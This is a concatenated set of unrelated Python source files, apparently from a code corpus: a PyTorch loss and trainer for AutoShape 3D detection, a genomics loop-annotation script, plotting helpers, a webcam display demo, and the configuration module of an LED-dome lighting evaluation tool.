                     'dst/static/js/file.js'):
            self.assertExists(path)
|
1690189
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import numpy as np
from models.losses import FocalLoss, RegL1Loss, RegLoss, RegWeightedL1Loss, BinRotLoss, AutoShape_Position_loss, RegWeightedL1Loss2
from models.utils import _sigmoid
from .base_trainer import BaseTrainer
class AutoShapeLoss(torch.nn.Module):
    """Multi-task loss for AutoShape: center heatmap, keypoints, 2D/3D box
    regression, rotation bins and a geometry-based position loss.

    All weighting/branch selection comes from the ``opt`` namespace.
    """
    def __init__(self, opt):
        super(AutoShapeLoss, self).__init__()
        # Object-center heatmap criterion.
        self.crit = FocalLoss()
        # Keypoint-heatmap criterion: MSE or focal, per opt.mse_loss.
        self.crit_hm_hp = torch.nn.MSELoss() if opt.mse_loss else FocalLoss()
        # Keypoint-offset criterion: dense L1 when opt.dense_hp, else masked.
        self.crit_kp = RegWeightedL1Loss() if not opt.dense_hp else \
            torch.nn.L1Loss(reduction='sum')
        self.crit_p3d = RegWeightedL1Loss2()
        # Generic regression criterion (wh/dim/reg/hp_offset heads).
        self.crit_reg = RegL1Loss() if opt.reg_loss == 'l1' else \
            RegLoss() if opt.reg_loss == 'sl1' else None
        self.crit_rot = BinRotLoss()
        self.opt = opt
        is_kitti = False
        if 'kitti' in opt.dataset: is_kitti = True
        self.position_loss = AutoShape_Position_loss(opt, is_kitti)
    def forward(self, outputs, batch, phase=None):
        """Compute all loss terms for the first output stage.

        :param outputs: list of head-name -> tensor dicts; only outputs[0]
            is used here.
        :param batch: ground-truth tensors keyed by head name.
        :param phase: forwarded to the position loss (train/val switch —
            semantics defined in AutoShape_Position_loss).
        :return: (loss_stats, loss_stats) — the same dict twice; the 'loss'
            entry is the position-loss box_score.  NOTE(review): returning
            the stats dict in both positions looks intentional for the
            BaseTrainer interface but is worth confirming.
        """
        opt = self.opt
        hm_loss, wh_loss, off_loss = 0, 0, 0
        hp_loss, off_loss, hm_hp_loss, hp_offset_loss = 0, 0, 0, 0
        dim_loss, rot_loss, prob_loss = 0, 0, 0
        p3d_loss = 0
        coor_loss =0
        box_score=0
        output = outputs[0]
        # Squash raw logits into probabilities before the focal losses.
        output['hm'] = _sigmoid(output['hm'])
        if opt.hm_hp and not opt.mse_loss:
            output['hm_hp'] = _sigmoid(output['hm_hp'])
        hm_loss = self.crit(output['hm'], batch['hm'])
        hp_loss = self.crit_kp(output['hps'],batch['hps_mask'], batch['ind'], batch['hps'],batch['dep'])
        if opt.wh_weight > 0:
            wh_loss = self.crit_reg(output['wh'], batch['reg_mask'],batch['ind'], batch['wh'])
        if opt.dim_weight > 0:
            dim_loss = self.crit_reg(output['dim'], batch['reg_mask'],batch['ind'], batch['dim'])
            # p3d regression is only accumulated when dim_weight > 0.
            p3d_loss += self.crit_reg(output['p3d'], batch['reg_mask'],
                                      batch['ind'], batch['p3d'])
        if opt.rot_weight > 0:
            rot_loss = self.crit_rot(output['rot'], batch['rot_mask'], batch['ind'], batch['rotbin'], batch['rotres'])
        if opt.reg_offset and opt.off_weight > 0:
            off_loss = self.crit_reg(output['reg'], batch['reg_mask'], batch['ind'], batch['reg'])
        if opt.reg_hp_offset and opt.off_weight > 0:
            hp_offset_loss = self.crit_reg(output['hp_offset'], batch['hp_mask'], batch['hp_ind'], batch['hp_offset'])
        if opt.hm_hp and opt.hm_hp_weight > 0:
            hm_hp_loss = self.crit_hm_hp(output['hm_hp'], batch['hm_hp'])
        coor_loss, prob_loss, box_score = self.position_loss(output, batch,phase)
        loss_stats = {'loss': box_score, 'hm_loss': hm_loss, 'hp_loss': hp_loss,
                      'hm_hp_loss': hm_hp_loss, 'hp_offset_loss': hp_offset_loss,
                      'wh_loss': wh_loss, 'off_loss': off_loss, 'dim_loss': dim_loss,
                      'rot_loss': rot_loss, 'prob_loss': prob_loss, 'box_score': box_score, 'coor_loss': coor_loss,
                      'p3d_loss': p3d_loss
                      }
        return loss_stats, loss_stats
class AutoShapeTrainer(BaseTrainer):
    """Trainer wiring AutoShapeLoss into the generic BaseTrainer loop."""

    def __init__(self, opt, model, optimizer=None):
        super(AutoShapeTrainer, self).__init__(opt, model, optimizer=optimizer)

    def _get_losses(self, opt):
        """Return the loss-stat names to log and the loss module itself."""
        loss_states = [
            'loss', 'hm_loss', 'hp_loss', 'hm_hp_loss', 'hp_offset_loss',
            'wh_loss', 'off_loss', 'dim_loss', 'rot_loss', 'prob_loss',
            'coor_loss', 'box_score', 'p3d_loss',
        ]
        return loss_states, AutoShapeLoss(opt)

    def debug(self, batch, output, iter_id):
        """Debug-visualization hook (intentionally unimplemented)."""
        pass

    def save_result(self, output, batch, results):
        """Result-persistence hook (intentionally unimplemented)."""
        pass
|
1690206
|
import argparse
def annotate_enhancer_promoter_loops(
        left_enhancers, right_enhancers, left_promoters, right_promoters):
    """
    Annotate loops as enhancer/promoter pairs from per-anchor overlap files.

    Each input is a BED-like file whose 4th column is the loop id.  Left
    files contribute columns 1-3; right files contribute columns 1-3 plus
    5-6.  Loops annotated on both anchors are written as PP / EP / PE rows
    to the path derived from *left_enhancers* by replacing
    '.left_anchors.enhancers' with '.enhancer_promoter'.
    """
    loops = {}
    left_coords = {}
    right_coords = {}
    _collect(left_enhancers, loops, 'left', 'E', left_coords, _left_fields)
    _collect(right_enhancers, loops, 'right', 'E', right_coords, _right_fields)
    _collect(left_promoters, loops, 'left', 'P', left_coords, _left_fields)
    _collect(right_promoters, loops, 'right', 'P', right_coords, _right_fields)
    out_file = left_enhancers.replace(
        '.left_anchors.enhancers', '.enhancer_promoter')
    with open(out_file, 'w') as out:
        for loop_id in sorted(loops.keys()):
            annot = _classify(loops[loop_id])
            if annot is None:
                continue
            res = left_coords[loop_id] + right_coords[loop_id] + [annot]
            out.write('\t'.join(res) + '\n')


def _left_fields(entry):
    """Coordinate columns kept for a left anchor (chrom, start, end)."""
    return [entry[0], entry[1], entry[2]]


def _right_fields(entry):
    """Coordinate columns kept for a right anchor (chrom, start, end, col5, col6)."""
    return [entry[0], entry[1], entry[2], entry[4], entry[5]]


def _collect(path, loops, side, mark, coords, fields):
    """Read *path* and record *mark* ('E'/'P') on *side* of every loop.

    Replaces four near-identical copy-pasted reader blocks; also avoids
    shadowing the builtin ``id``.
    """
    with open(path, 'r') as f:
        for line in f:
            entry = line.strip().split()
            loop_id = entry[3]
            loops.setdefault(loop_id, {}).setdefault(side, []).append(mark)
            coords[loop_id] = fields(entry)


def _classify(sides):
    """Return 'PP'/'EP'/'PE' for a loop annotated on both anchors, else None."""
    if 'left' not in sides or 'right' not in sides:
        return None
    if 'P' in sides['left'] and 'P' in sides['right']:
        return 'PP'
    if 'E' in sides['left'] and 'P' in sides['right']:
        return 'EP'
    if 'P' in sides['left'] and 'E' in sides['right']:
        return 'PE'
    return None
def parse_command_line_args():
    """
    Parse command-line arguments.

    Returns:
        args (class 'argparse.Namespace'):
            An object containing the parsed command-line arguments.
            For every command-line option, the values are stored as follows:
                args.{option}
    """
    parser = argparse.ArgumentParser()
    required = parser.add_argument_group('required arguments')
    # All four anchor-overlap files are mandatory.
    for short_flag, long_flag, help_text in (
            ('-a', '--left_enhancers', 'Left anchors overlapping enhancers.'),
            ('-b', '--right_enhancers', 'Right anchors overlapping enhancers.'),
            ('-c', '--left_promoters', 'Left anchors overlapping promoters.'),
            ('-d', '--right_promoters', 'Right anchors overlapping promoters.')):
        required.add_argument(short_flag, long_flag, required=True, help=help_text)
    return parser.parse_args()
# Entry point: parse the four anchor-overlap file paths and run the
# annotation end-to-end.
if __name__ == '__main__':
    args = parse_command_line_args()
    annotate_enhancer_promoter_loops(
        args.left_enhancers,
        args.right_enhancers,
        args.left_promoters,
        args.right_promoters)
|
1690217
|
import numpy as np
# import PIL.Image
import matplotlib.pyplot as plt
import matplotlib.cm as cm
# lowest = -1.0
lowest = 0.0
highest = 1.0
# --------------------------------------
# Color maps ([-1,1] -> [0,1]^3)
# --------------------------------------
def heatmap(x):
    """Map relevance values in [-1, 1] to RGB heat colors in [0, 1]^3.

    Positive relevance fades toward red, negative toward blue; zero maps
    to light gray (0.9, 0.9, 0.9).
    """
    x = x[..., np.newaxis]
    pos = x >= 0
    neg = x < 0

    def _primary(v):
        # Dominant channel: only fades over the upper [0.3, 1.0] band.
        return 0.9 - np.clip(v - 0.3, 0, 0.7) / 0.7 * 0.5

    def _secondary(v):
        # Remaining channels: fade over both the lower and upper bands.
        return (0.9
                - np.clip(v - 0.0, 0, 0.3) / 0.3 * 0.5
                - np.clip(v - 0.3, 0, 0.7) / 0.7 * 0.4)

    r = _primary(x) * pos + _secondary(-x) * neg
    g = _secondary(x) * pos + _secondary(-x) * neg
    b = _secondary(x) * pos + _primary(-x) * neg
    return np.concatenate([r, g, b], axis=-1)
def graymap(x):
    """Map values in [-1, 1] to grayscale RGB triples in [0, 1]^3."""
    channel = x[..., np.newaxis]
    return np.concatenate([channel, channel, channel], axis=-1) * 0.5 + 0.5
# --------------------------------------
# Visualizing data
# --------------------------------------
# def visualize(x,colormap,name):
#
# N = len(x)
# assert(N <= 16)
#
# x = colormap(x/np.abs(x).max())
#
# # Create a mosaic and upsample
# x = x.reshape([1, N, 29, 29, 3])
# x = np.pad(x, ((0, 0), (0, 0), (2, 2), (2, 2), (0, 0)), 'constant', constant_values=1)
# x = x.transpose([0, 2, 1, 3, 4]).reshape([1*33, N*33, 3])
# x = np.kron(x, np.ones([2, 2, 1]))
#
# PIL.Image.fromarray((x*255).astype('byte'), 'RGB').save(name)
def plt_vector(x, colormap, num_headers):
    """Tile N row vectors into one (num_headers, N*54, 3) RGB mosaic.

    Each row of *x* is zero-padded to num_headers*54 values, normalized by
    the global absolute maximum, colorized with *colormap*, and the rows
    are laid out side by side.

    Note: asserts N <= 16, and divides by zero when *x* is all zeros.
    """
    n_rows = len(x)
    assert n_rows <= 16
    width = 54
    height = num_headers
    padded = np.zeros((n_rows, height * width), dtype=np.float64)
    padded[:, :x.shape[1]] = x
    colored = colormap(padded / np.abs(padded).max())
    mosaic = colored.reshape([1, n_rows, height, width, 3])
    mosaic = mosaic.transpose([0, 2, 1, 3, 4])
    return mosaic.reshape([height, n_rows * width, 3])
def add_subplot(data, num_plots, plot_index, title, figure):
    """Render *data* as an image in row *plot_index* of a vertical stack.

    :param data: 2D/RGB array to display
    :param num_plots: total number of stacked rows in *figure*
    :param plot_index: 1-based row position for this plot
    :param title: subplot title
    :param figure: matplotlib figure to draw into
    """
    axis = figure.add_subplot(num_plots, 1, plot_index)
    axis.imshow(data, interpolation='nearest', aspect='auto')
    axis.set_title(title)
def plot_data(data, title):
    """Show *data* as a single full-figure image titled *title*."""
    # Figure size chosen to make a 16-header plot look good.
    plt.figure(figsize=(6.4, 2.5))
    plt.imshow(data, interpolation='nearest', aspect='auto')
    plt.title(title)
    plt.tight_layout()
def plotNNFilter(units):
    """Plot every filter of a conv activation tensor in a 6-column grid.

    :param units: array of shape (batch, h, w, filters); only batch 0 is shown
    """
    filters = units.shape[3]
    plt.figure(1, figsize=(20, 20))
    n_columns = 6
    # int(): np.ceil returns a float, and modern matplotlib rejects
    # non-integer subplot grid dimensions.
    n_rows = int(np.ceil(filters / n_columns)) + 1
    for i in range(filters):
        plt.subplot(n_rows, n_columns, i + 1)
        plt.title('Filter ' + str(i))
        plt.imshow(units[0, :, :, i], interpolation="nearest", cmap="gray")
|
1690253
|
import opencv
#this is important for capturing/displaying images
from opencv import highgui
import pygame
import sys
camera = highgui.cvCreateCameraCapture(0)


def get_image():
    """Grab one frame from the camera and return it as a PIL image."""
    frame = highgui.cvQueryFrame(camera)
    # cvGetMat is needed on some platforms (e.g. Ubuntu 8.04+) before the
    # adaptor can convert the IplImage.
    frame = opencv.cvGetMat(frame)
    return opencv.adaptors.Ipl2PIL(frame)
fps = 30.0
pygame.init()
window = pygame.display.set_mode((640, 480))
pygame.display.set_caption("Demo")
screen = pygame.display.get_surface()

# Main loop: exit on quit/keypress, otherwise blit the latest camera frame.
while True:
    for event in pygame.event.get():
        if event.type in (pygame.QUIT, pygame.KEYDOWN):
            sys.exit(0)
    frame = get_image()
    surface = pygame.image.frombuffer(frame.tostring(), frame.size, frame.mode)
    screen.blit(surface, (0, 0))
    pygame.display.flip()
    # Throttle to roughly `fps` frames per second.
    pygame.time.delay(int(1000 * 1.0 / fps))
|
1690281
|
from __future__ import division
from options import get_parsed_commandline_options
from data_3d import WaveFront
# from data_3d import *
from modes import *
from file_utils import *
from modes.manipulate_results_data import *
import logging
from service import GracefulShutdown
# ======================================================================
# --- Parameterised config update
# ======================================================================
# Module-level configuration derived from the parsed command line.
PARSE_OPTIONS,PARSE_ARGS = get_parsed_commandline_options()
class App:
    #@todo: Refactor the globals in this module into the 'App' class in 'config.py'.
    pass
# Program's Config
SELECT_BEST_LEDS = True if PARSE_OPTIONS.EVALUATION == 1 else False
#TODO:-- Bug due to mutable state reused for multiple purposes (toggle_test_evaluation_mode() function), replacing with PARSE_OPTIONS.EVALUATION == 1.
# -- Solution: Repurpose this module as DEMO MODE ONLY. Move all evaluations to another model and module. Move argument parsing to the MAIN.
QTY_OF_BEST_LEDS_REQUIRED = PARSE_OPTIONS.LEDS_QTY
default_QTY_OF_BEST_LEDS_REQUIRED = lambda: PARSE_OPTIONS.LEDS_QTY
TARGET_SHAPE = PARSE_OPTIONS.TARGET_SHAPE # None
TARGET_SCALE = PARSE_OPTIONS.TARGET_SCALE # 0.01
# NOTE(review): eval() of a command-line string executes arbitrary code;
# ast.literal_eval would be safer if this input can come from untrusted users.
TARGET_TRANSLATION = eval(PARSE_OPTIONS.TARGET_TRANSLATION) # (0,-3,0)
# Display Configuration for Scoring
USE_SHADING_SCORE = True if PARSE_OPTIONS.DISPLAY_EVALUATION_METRIC_OPTION == 1 else False
USE_COVERAGE_SCORE = not USE_SHADING_SCORE
SCORE_DESCRIPTION = "Intensity Score" if USE_SHADING_SCORE else "Coverage Error"
CSV_METRIC_COLUMN_INDEX = 1 if USE_SHADING_SCORE else 3
# Extra Detailed Program Configs:
DO_EVALUATIONS = True
DRAW_REFLECTION_RAY = True
DRAW_INCIDENT_RAY = True
DRAW_CAMERA_REFLECTION_RAY = True
# Frame scale comes from config; fall back to 8 when unset/invalid.
scale = property_to_number(section="FrameModel", key="frame.scale", vmin=1, vmax=20, vtype=float)
scale = scale if scale is not None else 8
TARGET_ROTATIONS = 6
TARGET_ROTATION_AXIS = (0,1,0)
TARGET_ROTATION_DEGREES=(360/TARGET_ROTATIONS)
# Camera Configuration:
camera_layout = CameraLayout_RealisticBias( scale ) if PARSE_OPTIONS.CAMERA_LAYOUT == 1 else CameraLayout_EvenBias( scale ) #cameraVertices = camera_layout.getCameraPositions() # cameraPos = camera_layout.getDefaultCameraPos()
#CAMERA_POSITION_DESCRIPTION = camera_layout.getDescription()
CAMERA_SHORT_DESCRIPTION = camera_layout.getShortDescription()
# Score log path is kept only when the option is set AND the file exists.
LED_SCORE_LOG_FILE = PARSE_OPTIONS.LED_SCORE_LOG_FILE if PARSE_OPTIONS.LED_SCORE_LOG_FILE != None and os.path.exists(PARSE_OPTIONS.LED_SCORE_LOG_FILE) else ""
logged_score_to_file = False
# Mutable run-state populated later by the toggle/load functions below.
BEST_LEDS = None
TARGET_TRIANGLES = None
TARGET_SHAPE_NAME = ''
BEST_LED_DATA_HEADER = None
BEST_LED_DATA = None
#BEST_LED_DATA_HEADER = file_io.read_in_csv_file_header_to_list(LED_SCORE_LOG_FILE) if SELECT_BEST_LEDS else None
#BEST_LED_DATA = file_io.read_in_csv_file_to_list_of_lists(LED_SCORE_LOG_FILE, skip_header=True) if SELECT_BEST_LEDS else None
HELP = {}
# ======================================================================
# --- Live config update
# ======================================================================
def define_help():
    """Populate the global key-to-description HELP table and print the F1 hint."""
    global HELP
    HELP['r'] = "Toggle scoring (maximised intensity / maximised target coverage)."
    HELP['c'] = "Toggle camera positioning."
    HELP['t'] = "Toggle test evaluation mode to verify angles and scoring.\n\t- Use Left-Arrow and Right-Arrow to change LED.\n\t- Use y/h/u/j/i/k to update incident ray X,Y,Z coordinate."
    #HELP['n'] = "Toggle target normals"
    HELP['l'] = "Load new score file."
    HELP['+'] = "Increase LEDs selected. (Shading Score only. Unchecked bounds.)"
    # Fixed mangled help text: was "Decrease LEDsdata_3d selected." (a stray
    # "data_3d" pasted into the user-facing string).
    HELP['-'] = "Decrease LEDs selected. (Shading Score only. Unchecked bounds.)"
    HELP['ws,ad,qe'] = "Manipulate the viewport XYZ positions (ws, ad, qe), or click-drag with mouse."
    HELP['Up'] = "Zoom in / Wheel-up"
    HELP['Down'] = "Zoom out / Wheel-down"
    HELP['F1'] = "Display help."
    HELP['Space'] = "Toggle scene rotation."
    HELP['Esc'] = "Exit."
    print("\nPress F1 to display help.\n")
def update_configs_via_keypress(key_events):
    """Dispatch a pending keypress to the matching config-toggle handler."""
    key = key_events.get_key()
    if key == '':
        return
    handlers = {
        'r': toggle_reflection_score,
        'c': toggle_camera_setup,
        't': toggle_test_evaluation_mode,
        'l': load_new_score_file,
        GLUT_KEY_F1: toggle_help,
        '+': increment_LED_quantity,
        '-': decrement_LED_quantity,
    }
    handler = handlers.get(key)
    if handler is not None:
        handler()
def toggle_help():
    """Print the HELP keybinding table to stdout."""
    global HELP
    print("---Help:---")
    for key, text in HELP.items():
        print(" " + str(key) + "\t" + str(text))
    print("-----------")
def toggle_reflection_score():
    """Flip between shading-score and coverage-score display modes."""
    global USE_SHADING_SCORE, USE_COVERAGE_SCORE, SCORE_DESCRIPTION, CSV_METRIC_COLUMN_INDEX, BEST_LEDS, QTY_OF_BEST_LEDS_REQUIRED
    USE_SHADING_SCORE = not USE_SHADING_SCORE
    USE_COVERAGE_SCORE = not USE_SHADING_SCORE
    if USE_SHADING_SCORE:
        SCORE_DESCRIPTION = "Shading Score"
        CSV_METRIC_COLUMN_INDEX = 1
    else:
        SCORE_DESCRIPTION = "Coverage Error"
        CSV_METRIC_COLUMN_INDEX = 3
    # Force LED re-selection under the new metric.
    BEST_LEDS = None
    if USE_COVERAGE_SCORE:
        QTY_OF_BEST_LEDS_REQUIRED = default_QTY_OF_BEST_LEDS_REQUIRED()
    print("Toggled scoring to Shading Score" if USE_SHADING_SCORE else "Toggled scoring to Coverage Score")
def toggle_camera_setup():
    """Switch between the realistic-bias and even-bias camera layouts."""
    global scale, camera_layout
    # isinstance replaces ``type(...) == ...`` — the idiomatic (and
    # subclass-aware) type check in Python.
    if isinstance(camera_layout, CameraLayout_RealisticBias):
        camera_layout = CameraLayout_EvenBias( scale )
    else:
        camera_layout = CameraLayout_RealisticBias( scale )
    print("Toggled camera to " + camera_layout.getShortDescription())
def toggle_test_evaluation_mode():
    """Toggle test-evaluation mode (active while SELECT_BEST_LEDS is False)."""
    global SELECT_BEST_LEDS, DO_EVALUATIONS
    SELECT_BEST_LEDS = not SELECT_BEST_LEDS
    # Evaluations run only while best-LED selection is enabled.
    DO_EVALUATIONS = SELECT_BEST_LEDS
    if SELECT_BEST_LEDS:
        print("Toggled test evaluation mode off")
    else:
        print("Toggled test evaluation mode on.")
def load_new_score_file():
    """Prompt for a new score CSV on stdin and load it if the file exists."""
    global LED_SCORE_LOG_FILE, BEST_LED_DATA, BEST_LED_DATA_HEADER, BEST_LEDS
    print(" === LOAD NEW SCORE FILE ===")
    print("Enter new input score filename and press enter:")
    print(" --- Current filename: "+LED_SCORE_LOG_FILE)
    candidate = raw_input()
    if not os.path.exists(candidate):
        print("File does not exist - no changes applied.")
        return
    LED_SCORE_LOG_FILE = candidate
    BEST_LEDS = None
    load_score_file()
    print("Loaded new file: "+str(candidate))
def increment_LED_quantity():
    """Grow the selected-LED count by one (shading score only; unchecked bounds)."""
    global QTY_OF_BEST_LEDS_REQUIRED, BEST_LEDS
    if USE_COVERAGE_SCORE:
        # Coverage mode pins the quantity to the configured default.
        QTY_OF_BEST_LEDS_REQUIRED = default_QTY_OF_BEST_LEDS_REQUIRED()
    else:
        QTY_OF_BEST_LEDS_REQUIRED += 1
        BEST_LEDS = None
        print("Increased QTY_OF_BEST_LEDS "+str(QTY_OF_BEST_LEDS_REQUIRED)+". Unchecked bounds.")
def decrement_LED_quantity():
    """Lower the requested best-LED count by one (shading mode only).

    In coverage mode the quantity is pinned back to its default instead.
    """
    global QTY_OF_BEST_LEDS_REQUIRED, BEST_LEDS
    if USE_COVERAGE_SCORE:
        QTY_OF_BEST_LEDS_REQUIRED = default_QTY_OF_BEST_LEDS_REQUIRED()
    else:
        QTY_OF_BEST_LEDS_REQUIRED -= 1
        BEST_LEDS = None  # cached selection no longer matches the new quantity
        print("Decreased QTY_OF_BEST_LEDS "+str(QTY_OF_BEST_LEDS_REQUIRED)+". Unchecked bounds.")
# ======================================================================
# --- Draw simulation objects
# ======================================================================
class Tool:
    """Per-frame driver: draws the scene scaffolding (axes, cameras) and
    dispatches to the configured tool strategy, falling back to the legacy
    selector when no modern tool handles the frame."""

    def __init__(self):
        global scale
        self.scale = scale
        self.cameras_vertices = camera_layout.getCameraPositions()
        self.tool = ToolSelector(self.scale)
        self.OLD_TOOLS_HERE = OldToolSelector_Untested(self.scale)

    def run(self):
        # TODO: hack to make headless evaluation runs faster; an ideal
        # implementation refactors run.py to separate GL drawing from the
        # numerical evaluations.
        if glutGet(GLUT_INIT_STATE) == 1:  # draw only when GLUT is initialised
            draw_axes(self.scale, 2)
            draw_cameras(self.cameras_vertices)
        handled = self.tool.selector()
        if not handled:
            # No modern strategy matched: defer to the pre-v0.1.3 selector.
            self.OLD_TOOLS_HERE.selector(self.scale, self.cameras_vertices)
class ToolSelector(object):
    """
    The fundamental conduit and selection mechanic to choose application behaviour; e.g. evaluations vs display vs tuning. and which behaviour strategy.
    """
    # Class-level one-shot flag: the "no tool selected" warning logs only once.
    warned = False

    def __init__(self, scale):
        # Evaluator strategy instance, created lazily on first selector() call.
        self.cached_tool = None
        # self.triangles, self.shape_name = get_target_shape_triangles()
        # Load the target mesh once; selector() hands shallow copies to tools.
        self.triangles, self.shape_name = WaveFront.get_target_shape(
            PARSE_OPTIONS.TARGET_SHAPE,
            PARSE_OPTIONS.TARGET_SCALE,
            eval(PARSE_OPTIONS.TARGET_TRANSLATION)  # NOTE(review): eval of a CLI option — trusted input assumed
        )
        self.scale = scale

    def selector(self):
        """Instantiate (once) and run the evaluator chosen by runtime options.

        Returns True when a tool handled the frame, False when the caller
        should fall back to the legacy selector.
        """
        result = True
        triangles = self.triangles[:]  # shallow copy so tools cannot mutate the cache
        shape_name = self.shape_name
        kwords = {
            'all_leds': WaveFront.get_hardcoded_frame(self.scale)
            # draw_dome(self.scale,
            #                     show_points=False,
            #                     show_led_spheres=False,
            #                     show_tris=False,
            #                     show_lines=False,
            #                     get_not_show_tris=False,
            #                     show_selected_leds=None)
        }
        # (1) Select Class Reference to Execute: ( See modes/illuminance/illuminance.py classes. )
        if self.cached_tool is None:
            # Map EVALUATION_METRIC_MODE to an evaluator class; unknown modes
            # yield None and fall through to the legacy path.
            switcher = {
                3: VertexIndexPositionEvaluator,
                4: EdgeXIndexPositionEvaluator,
                7: RawPositionEvaluator,
                8: VertexMappedPositionEvaluator,
                9: EdgeXMappedPositionEvaluator,
            }
            tool_class = switcher.get(PARSE_OPTIONS.EVALUATION_METRIC_MODE, None)
            # Instantiate Selected (1) Class
            self.cached_tool = tool_class(kwords) if tool_class is not None else None
        if self.cached_tool is None:
            result = False
            if ToolSelector.warned is False:
                logging.warning("New Tool strategy failed to be selected and/or initialized.")
                ToolSelector.warned = True
        # (3) Select Function Reference to Execute:
        if result:
            # Map the EVALUATION option to a bound method of the cached tool;
            # unknown values become a no-op.
            switcher = {
                1: self.cached_tool.display,
                2: self.cached_tool.evaluate,
                3: self.cached_tool.tune,
                4: self.cached_tool.sequence_runner,
            }
            func = switcher.get(PARSE_OPTIONS.EVALUATION, lambda x: None)
            #Execute (2) function on that (1) class:
            func(triangles)
        return result
class OldToolSelector_Untested(ToolSelector):
    """
    Evaluation (-m2) disabled in favour of cleaner code, more modern opengl code and illuminance evaluation methods.
    Viewing (-m1) positions from file, etc. remains operable.
    Also see /modes/luminance/luminance.py
    """
    # One-shot flag so the legacy-mode warning prints only once.
    warned = False

    def selector(self, scale, camerasVertices):
        # Legacy (pre-v0.1.3) dispatch keyed on EVALUATION_METRIC_MODE and
        # EVALUATION. Side effects: GL drawing; mode 2 terminates the app via
        # GracefulShutdown.
        global camera_layout
        if not OldToolSelector_Untested.warned:
            print("Warning pre:v0.1.3 mode selected: Check runtime argument -e (--evaluation-metric-mode): " +str(PARSE_OPTIONS.EVALUATION_METRIC_MODE))
            print("--Untested features ahead--")
            OldToolSelector_Untested.warned = True
        triangles = self.triangles[:]
        shape_name = self.shape_name
        # EVALUATION selects behaviour: 1 = demo/display, 2 = evaluate, 3 = tune.
        do_demo = PARSE_OPTIONS.EVALUATION == 1
        do_evaluation = PARSE_OPTIONS.EVALUATION == 2
        do_tune = PARSE_OPTIONS.EVALUATION == 3
        # todo: This is a hack. Replace with polymorphic calls. Separate off the pre-V0.1.3 code that depend on options and globals instead of depend on properties file. Move luminance.py module code and unused reflectance modes - METRIC_MODE:0,1,4,5,6 out.
        if PARSE_OPTIONS.EVALUATION_METRIC_MODE == 0:
            if do_demo:
                draw_selected_leds( camerasVertices, triangles, shape_name)
            elif do_evaluation:
                print("No evaluation mode. Try demo mode (i.e. -m1)")
                pass
            elif do_tune:
                print("No tune mode. Try demo mode (i.e. -m1)")
                pass
        elif PARSE_OPTIONS.EVALUATION_METRIC_MODE == 1: #EVALUATION_MODE_REFLECTANCE:
            # Lazily create the reflectance tool once and reuse it.
            self.cached_tool = self.cached_tool if self.cached_tool is not None else MeasureReflectanceIntoCameras()
            if do_demo:
                all_leds = draw_dome(scale, True)
                # Bundle the module-level configuration the legacy tool expects.
                kwords = {
                    'LED_SCORE_LOG_FILE': LED_SCORE_LOG_FILE,
                    'CSV_METRIC_COLUMN_INDEX': 3,
                    'QTY_OF_BEST_LEDS_REQUIRED': QTY_OF_BEST_LEDS_REQUIRED,
                    'all_leds': all_leds,
                    'DO_EVALUATIONS': DO_EVALUATIONS,
                    'TARGET_ROTATIONS': TARGET_ROTATIONS,
                    'TARGET_TRIANGLES': TARGET_TRIANGLES,
                    'TARGET_ROTATION_DEGREES': TARGET_ROTATION_DEGREES,
                    'TARGET_ROTATION_AXIS': TARGET_ROTATION_AXIS,
                    'TARGET_SCALE': TARGET_SCALE,
                    'TARGET_TRANSLATION': TARGET_TRANSLATION,
                    'logged_score_to_file': logged_score_to_file,
                    'SELECT_BEST_LEDS': SELECT_BEST_LEDS,
                    'PARSE_OPTIONS': PARSE_OPTIONS,
                }
                self.cached_tool.display(triangles, shape_name, kwords)
            elif do_evaluation:
                #all_leds = draw_dome(scale, True)
                # Evaluation path: collect LED data without rendering anything.
                all_leds = draw_dome(scale,
                                     show_points=False,
                                     show_led_spheres=False,
                                     show_tris=False,
                                     show_lines=False,
                                     get_not_show_tris=False,
                                     show_selected_leds=None)
                kwords = {
                    'LED_SCORE_LOG_FILE': LED_SCORE_LOG_FILE,
                    'CSV_METRIC_COLUMN_INDEX': 3,
                    'QTY_OF_BEST_LEDS_REQUIRED': QTY_OF_BEST_LEDS_REQUIRED,
                    'all_leds': all_leds,
                    'DO_EVALUATIONS': DO_EVALUATIONS,
                    'TARGET_ROTATIONS': TARGET_ROTATIONS,
                    'TARGET_TRIANGLES': TARGET_TRIANGLES,
                    'TARGET_ROTATION_DEGREES': TARGET_ROTATION_DEGREES,
                    'TARGET_ROTATION_AXIS': TARGET_ROTATION_AXIS,
                    'TARGET_SCALE': TARGET_SCALE,
                    'TARGET_TRANSLATION': TARGET_TRANSLATION,
                    'logged_score_to_file': logged_score_to_file,
                    'SELECT_BEST_LEDS': SELECT_BEST_LEDS,
                    'PARSE_OPTIONS': PARSE_OPTIONS,
                }
                self.cached_tool.evaluate( camerasVertices, triangles, shape_name, camera_layout, kwords)
            elif do_tune:
                print("No tune mode. Try demo mode (i.e. -m1)")
                pass
        elif PARSE_OPTIONS.EVALUATION_METRIC_MODE == 2: #EVALUATION_MODE_ILLUMINATION:
            #evaluate_illuminance_score( camerasVertices, triangles, shape_name )
            if do_demo:
                #draw_selected_leds( camerasVertices, triangles, shape_name)
                #evaluate_illuminance_score( camerasVertices, triangles, shape_name)
                print("This evaluation metric mode has been disabled and is marked for refactoring.")
            elif do_evaluation:
                print("This evaluation metric mode has been disabled and is marked for refactoring.")
            elif do_tune:
                print("No tune mode. Try demo mode (i.e. -m1)")
                pass
            # Mode 2 is retired: terminate the application cleanly.
            GracefulShutdown.do_shutdown()
        # elif PARSE_OPTIONS.EVALUATION_METRIC_MODE == 4: #EVALUATION_MODE_ILLUMINATION_MULTI:
        #     raise("This evaluation metric needs refactoring. To be refactored and tested. Now exiting.")
        #     sys.exit()
        #     all_leds = draw_dome( scale , True )
        #     kwords = {
        #         'LED_SCORE_LOG_FILE':LED_SCORE_LOG_FILE,
        #         'CSV_METRIC_COLUMN_INDEX':3,
        #         'QTY_OF_BEST_LEDS_REQUIRED':QTY_OF_BEST_LEDS_REQUIRED,
        #         'all_leds':all_leds
        #     }
        #     evaluate_illuminance_score_multiple_result_file_set( updateable_line, camerasVertices, triangles, shape_name, 100000, kwords )
        #
        # elif PARSE_OPTIONS.EVALUATION_METRIC_MODE == 5: #EVALUATION_MODE_ILLUMINATION_WEIGHT:
        #     ## --- evaluate_illuminance_score_result_file_set_tune_weights( updateable_line, camerasVertices, triangles, shape_name )
        #     #x = MeasureIlluminanceTuneWeights_AOS()
        #     #x.evaluate(updateable_line, camerasVertices, triangles, shape_name)
        #     raise("This evaluation metric needs refactoring. To be refactored and tested. Now exiting.")
